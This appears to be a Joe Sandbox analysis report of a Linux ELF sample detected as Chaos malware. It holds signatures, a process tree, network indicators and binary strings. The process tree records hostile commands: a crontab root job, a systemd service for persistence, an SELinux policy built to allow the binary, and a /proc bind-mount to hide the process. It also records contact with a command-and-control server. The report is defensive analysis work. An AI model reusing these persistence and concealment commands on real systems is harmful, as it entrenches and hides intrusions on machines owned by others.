Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
linux_386.elf

Overview

General Information

Sample name:linux_386.elf
Analysis ID:1562731
MD5:f5c59e70b89c03eb69f02a7be662ed59
SHA1:f1dc3d2d6c85692a2419517d3473bb370cf86510
SHA256:ae49891720a4fa75f48a58efd4fc5dcd369f8c99add24e781191616f46149457
Tags:elfuser-abuse_ch
Infos:

Detection

Chaos
Score:84
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Chaos
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Machine Learning detection for sample
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using cron
Sample tries to set files in /etc globally writable
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /sys indicative of miner or evasive malware
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension
Writes shell script files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1562731
Start date and time:2024-11-25 23:46:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 7m 16s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:linux_386.elf
Detection:MAL
Classification:mal84.spre.troj.evad.linELF@0/29@6/0
  • Report size exceeded maximum capacity and may have missing behavior information.
  • VT rate limit hit for: linux_386.elf
Command:/tmp/linux_386.elf
PID:5429
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • linux_386.elf (PID: 5429, Parent: 5350, MD5: f5c59e70b89c03eb69f02a7be662ed59) Arguments: /tmp/linux_386.elf
    • bash (PID: 5434, Parent: 5429, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c /etc/32678&
      • bash New Fork (PID: 5437, Parent: 5434)
      • 32678 (PID: 5437, Parent: 2935, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
        • 32678 New Fork (PID: 5448, Parent: 5437)
        • sleep (PID: 5448, Parent: 5437, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
    • service (PID: 5435, Parent: 5429, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
      • service New Fork (PID: 5441, Parent: 5435)
      • basename (PID: 5441, Parent: 5435, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 5449, Parent: 5435)
      • basename (PID: 5449, Parent: 5435, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 5451, Parent: 5435)
      • systemctl (PID: 5451, Parent: 5435, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 5456, Parent: 5435)
        • service New Fork (PID: 5457, Parent: 5456)
        • systemctl (PID: 5457, Parent: 5456, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 5458, Parent: 5456)
        • sed (PID: 5458, Parent: 5456, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 5435, Parent: 5429, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
    • linux_386.elf (PID: 5436, Parent: 5429, MD5: f5c59e70b89c03eb69f02a7be662ed59) Arguments: /tmp/linux_386.elf
      • update-rc.d (PID: 5447, Parent: 5436, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d linux_kill defaults
        • systemctl (PID: 5455, Parent: 5447, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • bash (PID: 5471, Parent: 5436, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"
        • bash New Fork (PID: 5472, Parent: 5471)
        • systemctl (PID: 5472, Parent: 5471, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
        • bash New Fork (PID: 5478, Parent: 5471)
        • systemctl (PID: 5478, Parent: 5471, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable linux.service
        • bash New Fork (PID: 5492, Parent: 5471)
        • systemctl (PID: 5492, Parent: 5471, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start linux.service
        • bash New Fork (PID: 5519, Parent: 5471)
        • journalctl (PID: 5519, Parent: 5471, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager
      • bash (PID: 5538, Parent: 5436, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'System.img.conf' --raw | audit2allow -M my-Systemimgconf;semodule -X 300 -i my-Systemimgconf.pp"
        • bash New Fork (PID: 5539, Parent: 5538)
        • bash New Fork (PID: 5540, Parent: 5538)
        • bash New Fork (PID: 5561, Parent: 5538)
      • bash (PID: 5562, Parent: 5436, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: bash -c "echo \"*/1 * * * * root /.img \" >> /etc/crontab"
      • renice (PID: 5563, Parent: 5436, MD5: 3686c936ed1df483498266a36871cb5b) Arguments: renice -20 5436
      • mount (PID: 5564, Parent: 5436, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/5436
      • service (PID: 5586, Parent: 5436, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start
        • service New Fork (PID: 5601, Parent: 5586)
        • basename (PID: 5601, Parent: 5586, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5602, Parent: 5586)
        • basename (PID: 5602, Parent: 5586, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5603, Parent: 5586)
        • systemctl (PID: 5603, Parent: 5586, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5608, Parent: 5586)
          • service New Fork (PID: 5609, Parent: 5608)
          • systemctl (PID: 5609, Parent: 5608, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5610, Parent: 5608)
          • sed (PID: 5610, Parent: 5608, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5586, Parent: 5436, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service
      • systemctl (PID: 5623, Parent: 5436, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
  • systemd New Fork (PID: 5466, Parent: 5465)
  • snapd-env-generator (PID: 5466, Parent: 5465, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5476, Parent: 5475)
  • snapd-env-generator (PID: 5476, Parent: 5475, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5484, Parent: 5483)
  • snapd-env-generator (PID: 5484, Parent: 5483, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5494, Parent: 1)
  • System.img.config (PID: 5494, Parent: 1, MD5: f5c59e70b89c03eb69f02a7be662ed59) Arguments: /boot/System.img.config
    • pkill (PID: 5507, Parent: 5494, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 32678
    • sh (PID: 5512, Parent: 5494, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /etc/32678&
      • sh New Fork (PID: 5515, Parent: 5512)
      • 32678 (PID: 5515, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
        • 32678 New Fork (PID: 5530, Parent: 5515)
        • sleep (PID: 5530, Parent: 5515, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
        • 32678 New Fork (PID: 5681, Parent: 5515)
        • id.services.conf (PID: 5681, Parent: 5515, MD5: f5c59e70b89c03eb69f02a7be662ed59) Arguments: /etc/id.services.conf
          • pkill (PID: 5685, Parent: 5681, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 32678
          • sh (PID: 5688, Parent: 5681, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /etc/32678&
            • sh New Fork (PID: 5691, Parent: 5688)
            • 32678 (PID: 5691, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
              • 32678 New Fork (PID: 5696, Parent: 5691)
              • sleep (PID: 5696, Parent: 5691, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
              • 32678 New Fork (PID: 5758, Parent: 5691)
              • id.services.conf (PID: 5758, Parent: 5691, MD5: f5c59e70b89c03eb69f02a7be662ed59) Arguments: /etc/id.services.conf
                • pkill (PID: 5762, Parent: 5758, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 32678
                • sh (PID: 5764, Parent: 5758, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /etc/32678&
                  • sh New Fork (PID: 5766, Parent: 5764)
                  • 32678 (PID: 5766, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
                    • 32678 New Fork (PID: 5779, Parent: 5766)
                    • sleep (PID: 5779, Parent: 5766, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
                    • 32678 New Fork (PID: 5828, Parent: 5766)
                    • id.services.conf (PID: 5828, Parent: 5766, MD5: f5c59e70b89c03eb69f02a7be662ed59) Arguments: /etc/id.services.conf
                      • pkill (PID: 5832, Parent: 5828, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 32678
                      • sh (PID: 5833, Parent: 5828, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /etc/32678&
                        • sh New Fork (PID: 5836, Parent: 5833)
                        • 32678 (PID: 5836, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
                          • 32678 New Fork (PID: 5845, Parent: 5836)
                          • sleep (PID: 5845, Parent: 5836, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
                      • service (PID: 5834, Parent: 5828, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
                        • service New Fork (PID: 5844, Parent: 5834)
                        • basename (PID: 5844, Parent: 5834, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
                        • service New Fork (PID: 5846, Parent: 5834)
                        • basename (PID: 5846, Parent: 5834, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
                        • service New Fork (PID: 5847, Parent: 5834)
                        • systemctl (PID: 5847, Parent: 5834, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
                        • service New Fork (PID: 5848, Parent: 5834)
                          • service New Fork (PID: 5849, Parent: 5848)
                          • systemctl (PID: 5849, Parent: 5848, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
                          • service New Fork (PID: 5850, Parent: 5848)
                          • sed (PID: 5850, Parent: 5848, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                      • systemctl (PID: 5834, Parent: 1, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
                      • id.services.conf (PID: 5835, Parent: 5828, MD5: f5c59e70b89c03eb69f02a7be662ed59) Arguments: /etc/id.services.conf
                • service (PID: 5765, Parent: 5758, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
                  • service New Fork (PID: 5775, Parent: 5765)
                  • basename (PID: 5775, Parent: 5765, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
                  • service New Fork (PID: 5780, Parent: 5765)
                  • basename (PID: 5780, Parent: 5765, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
                  • service New Fork (PID: 5781, Parent: 5765)
                  • systemctl (PID: 5781, Parent: 5765, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
                  • service New Fork (PID: 5782, Parent: 5765)
                    • service New Fork (PID: 5783, Parent: 5782)
                    • systemctl (PID: 5783, Parent: 5782, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
                    • service New Fork (PID: 5784, Parent: 5782)
                    • sed (PID: 5784, Parent: 5782, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                • systemctl (PID: 5765, Parent: 1, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
                • id.services.conf (PID: 5767, Parent: 5758, MD5: f5c59e70b89c03eb69f02a7be662ed59) Arguments: /etc/id.services.conf
          • service (PID: 5689, Parent: 5681, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
            • service New Fork (PID: 5695, Parent: 5689)
            • basename (PID: 5695, Parent: 5689, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5697, Parent: 5689)
            • basename (PID: 5697, Parent: 5689, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5698, Parent: 5689)
            • systemctl (PID: 5698, Parent: 5689, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 5699, Parent: 5689)
              • service New Fork (PID: 5700, Parent: 5699)
              • systemctl (PID: 5700, Parent: 5699, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 5701, Parent: 5699)
              • sed (PID: 5701, Parent: 5699, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
          • systemctl (PID: 5689, Parent: 1, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
          • id.services.conf (PID: 5690, Parent: 5681, MD5: f5c59e70b89c03eb69f02a7be662ed59) Arguments: /etc/id.services.conf
    • service (PID: 5513, Parent: 5494, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
      • service New Fork (PID: 5525, Parent: 5513)
      • basename (PID: 5525, Parent: 5513, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 5529, Parent: 5513)
      • basename (PID: 5529, Parent: 5513, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 5531, Parent: 5513)
      • systemctl (PID: 5531, Parent: 5513, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 5532, Parent: 5513)
        • service New Fork (PID: 5533, Parent: 5532)
        • systemctl (PID: 5533, Parent: 5532, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 5534, Parent: 5532)
        • sed (PID: 5534, Parent: 5532, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 5513, Parent: 1, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
    • System.img.config (PID: 5514, Parent: 5494, MD5: f5c59e70b89c03eb69f02a7be662ed59) Arguments: /boot/System.img.config
  • udisksd New Fork (PID: 5575, Parent: 802)
  • dumpe2fs (PID: 5575, Parent: 802, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • sshd New Fork (PID: 5612, Parent: 936)
  • sshd (PID: 5612, Parent: 936, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
  • sshd New Fork (PID: 5618, Parent: 936)
  • sshd (PID: 5618, Parent: 936, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
  • systemd New Fork (PID: 5619, Parent: 1)
  • cron (PID: 5619, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 5652, Parent: 5619)
      • cron New Fork (PID: 5661, Parent: 5652)
      • sh (PID: 5661, Parent: 5652, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.img "
        • sh New Fork (PID: 5662, Parent: 5661)
  • sshd New Fork (PID: 5624, Parent: 936)
  • sshd (PID: 5624, Parent: 936, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5625, Parent: 5624)
  • sshd New Fork (PID: 5626, Parent: 936)
  • sshd (PID: 5626, Parent: 936, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5627, Parent: 5626)
  • sshd New Fork (PID: 5630, Parent: 936)
  • sshd (PID: 5630, Parent: 936, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5631, Parent: 5630)
  • sshd New Fork (PID: 5632, Parent: 936)
  • sshd (PID: 5632, Parent: 936, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
  • sshd New Fork (PID: 5633, Parent: 936)
  • sshd (PID: 5633, Parent: 936, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5634, Parent: 5633)
  • sshd New Fork (PID: 5637, Parent: 936)
  • sshd (PID: 5637, Parent: 936, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5638, Parent: 5637)
  • sshd New Fork (PID: 5639, Parent: 936)
  • sshd (PID: 5639, Parent: 936, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5640, Parent: 5639)
  • systemd New Fork (PID: 5674, Parent: 1)
  • cron (PID: 5674, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 5722, Parent: 5674)
      • cron New Fork (PID: 5728, Parent: 5722)
      • sh (PID: 5728, Parent: 5722, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.img "
        • sh New Fork (PID: 5729, Parent: 5728)
  • systemd New Fork (PID: 5749, Parent: 1)
  • cron (PID: 5749, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 5811, Parent: 5749)
      • cron New Fork (PID: 5812, Parent: 5811)
      • sh (PID: 5812, Parent: 5811, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.img "
        • sh New Fork (PID: 5813, Parent: 5812)
  • systemd New Fork (PID: 5818, Parent: 1)
  • cron (PID: 5818, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 5870, Parent: 5818)
      • cron New Fork (PID: 5871, Parent: 5870)
      • sh (PID: 5871, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.img "
        • sh New Fork (PID: 5872, Parent: 5871)
  • systemd New Fork (PID: 5877, Parent: 1)
  • cron (PID: 5877, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
ChaosMulti-functional malware written in Go, targeting both Linux and Windows, evolved from elf.kaiji.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.chaos
SourceRuleDescriptionAuthorStrings
linux_386.elfJoeSecurity_ChaosGoYara detected ChaosJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: linux_386.elfReversingLabs: Detection: 55%
    Source: linux_386.elfJoe Sandbox ML: detected
    Source: /usr/bin/pkill (PID: 5507)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pkill (PID: 5685)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pkill (PID: 5762)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pkill (PID: 5832)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

    Networking

    barindex
    Source: global trafficTCP traffic: 103.135.101.78 ports 808,52462,2,4,5,6
    Source: unknownNetwork traffic detected: HTTP traffic on port 48720 -> 808
    Source: unknownNetwork traffic detected: HTTP traffic on port 808 -> 48720
    Source: global trafficTCP traffic: 192.168.2.13:38944 -> 103.135.101.78:52462
    Source: /tmp/linux_386.elf (PID: 5436)Reads hosts file: /etc/hostsJump to behavior
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /password.txt HTTP/1.1Host: 103.135.101.78:808User-Agent: Go-http-client/1.1Accept-Encoding: gzip
    Source: linux_386.elfString found in binary or memory: http2: Transport conn %p received error from processing frame %v: %vhttp2: Transport received unsolicited DATA frame; closing connectionhttp: message cannot contain multiple Content-Length headers; got %qpadding bytes must all be zeros unless AllowIllegalWrites is enabledreflect: reflect.Value.UnsafePointer on an invalid notinheap pointerhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)tls: handshake message of length %d bytes exceeds maximum of %d bytestls: peer doesn't support the certificate custom signature algorithmsbytes.Buffer: UnreadByte: previous operation was not a successful readcannot convert slice with length %y to pointer to array with length %xgot %s for stream %d; expected CONTINUATION following %s for stream %dx509: PKCS#8 wrapping contained private key with unknown algorithm: %vx509: certificate relies on legacy Common Name field, use SANs insteadMozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)Sogou Pic Spider/3.0(+http://www.sogou.com/docs/help/webmasters.htm#07)Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)dynamic table size update MUST occur at the beginning of a header blockssh: no common algorithm for %s; client offered: %v, server offered: %vtls: peer doesn't support any of the certificate's signature algorithmstoo many concurrent operations on a single file or socket (max 1048575)x509: issuer has name constraints but leaf doesn't have a SAN extensionMozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)tls: server's certificate contains an unsupported type of public key: %Ttls: received unexpected handshake message of type %T when waiting for %T91289437fa036b34da55d57af6192768c27bd433fa012169d626d934e0051b24dd67dd3cf49d7cc827bc012d259d7ac226e70829239d7ac226e7082968de60d520eb433722c07fd236f6crypto/elliptic: internal error: Unmarshal rejected a valid point encodingmalformed response from server: malformed non-numeric status pseudo headernet/http: server replied with more than declared Content-Length; truncatedtls: certificate RSA key size too small for supported signature algorithmsUnsolicited response received on idle HTTP channel starting with %q; err=%vtls: internal error: attempted to read record with pending application datatls: failed to send closeNotify alert (but connection was closed anyway): %wtls: server certificate contains incorrect key type for selected ciphersuite((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}MapIter.Next called on an iterator that does not have an associated map Valuecrypto/tls: ExportKeyingMaterial is unavailable when renegotiation is enabled115792089210356248762697446949407573529996955224135760342422259061068512044369115792089210356248762697446949407573530086143415290314195533631308867097853951ssh: internal error: algorithmSignerWrapper invoked with non-default algorithmssh: unable to authenticate, attempted methods %v, no supported methods remainx509: signature check attempt
    Source: linux_386.elfString found in binary or memory: http: RoundTripper implementation (%T) returned a nil *Response with a nil errortls: either ServerName or InsecureSkipVerify must be specified in the tls.Configx509: invalid signature: parent certificate cannot sign this kind of certificaterefusing to use HTTP_PROXY value in CGI environment; see golang.org/s/cgihttpproxyx509: a root or intermediate certificate is not authorized to sign for this name: (possibly because of %q while trying to verify candidate authority certificate %q)Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)x509: issuer has name constraints but leaf contains unknown or unconstrained name: tls: downgrade attempt detected, possibly due to a MitM attack or a broken middleboxx509: signature algorithm specifies an %s public key, but have public key of type %Treflect.Value.Interface: cannot return value obtained from unexported field or methodx509: failed to parse private key (use ParseECPrivateKey instead for this key format)Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/;)reflect: New of type that may not be allocated in heap (possibly undefined cgo C type)x509: a root or intermediate certificate is not authorized for an extended key usage: fxfzUc6gtMGc/i26ld3KydGKy1k7QqyMMyxjbU1Rlk+F9LQxnaTeCHGHsDUpaBeOWDeY6l+2kHlB7EWTLcGwfg==whv+Kf1cEtOXzr+zuvmef2as0WfbUDm8l2LMWBMel10NDnbShg9CsMUt327VJhOTbXLoPYJVTKy8MBPCVwoT8A==x509: failed to parse private key (use ParsePKCS1PrivateKey instead for this key format)x509: failed to parse private key (use ParsePKCS8PrivateKey instead for this key format)Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)http2: server sent GOAWAY and closed the connection; LastStreamID=%v, ErrCode=%v, debug=%qapplication/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5tls: handshake hash for a client certificate requested after discarding the handshake buffertls: unsupported certificate: private key is *ed25519.PrivateKey, expected ed25519.PrivateKey3617de4a96262c6f5d9e98bf9292dc29f8f41dbd289a147ce9da3113b5f0b8c00a60b1ce1d7e819d7a431d7c90ea0e5faa87ca22be8b05378eb1c71ef320ad746e1d3b628ba79b9859f741e082542a385502f25dbf55296c3a545e3872760ab7b3312fa7e23ee7e4988e056be3f82d19181d9c6efe8141120314088f5013875ac656398d8a2ed19d2a85c8edd3ec2aefhttp: RoundTripper implementation (%T) returned a *Response with content length %d but a nil BodyNoClientCertRequestClientCertRequireAnyClientCertVerifyClientCertIfGivenRequireAndVerifyClientCertcipher: the nonce can't have zero length, or the security of the key will be immediately compromisedssh<<RMS>> equals www.yahoo.com (Yahoo)
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: aras.liveya.org
    Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
    Source: linux_386.elfString found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)x509:
    Source: linux_386.elfString found in binary or memory: http://search.msn.com/msnbot.htm
    Source: linux_386.elfString found in binary or memory: http://www.baidu.com/search/spider.html)
    Source: linux_386.elfString found in binary or memory: http://www.baidu.com/search/spider.html)000102030405060708091011121314151617181920212223242526272829
    Source: linux_386.elfString found in binary or memory: http://www.baidu.com/search/spider.html)Mozilla/5.0
    Source: linux_386.elfString found in binary or memory: http://www.baidu.com/search/spider.html)http2:
    Source: linux_386.elfString found in binary or memory: http://www.entireweb.com/about/search_tech/speedy_spider/)text/html
    Source: linux_386.elfString found in binary or memory: http://www.google.com/mobile/adsbot.html)
    Source: linux_386.elfString found in binary or memory: http://www.haosou.com/help/help_3_2.htmlMozilla/5.0
    Source: linux_386.elfString found in binary or memory: http://www.huaweisymantec.com/cn/IRL/spider)Mozilla/5.0
    Source: linux_386.elfString found in binary or memory: http://www.youdao.com/help/webmaster/spider/;)reflect:
    Source: linux_386.elfString found in binary or memory: http://yandex.com/bots)http:
    Source: linux_386.elfString found in binary or memory: https://search.yahoo.com/search?p=illegal
    Source: linux_386.elfString found in binary or memory: https://www.baidu.com/s?wd=insufficient
    Source: linux_386.elfString found in binary or memory: https://www.so.com/s?q=index
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: /usr/bin/pkill (PID: 5507)SIGKILL sent: pid: 5437, result: successfulJump to behavior
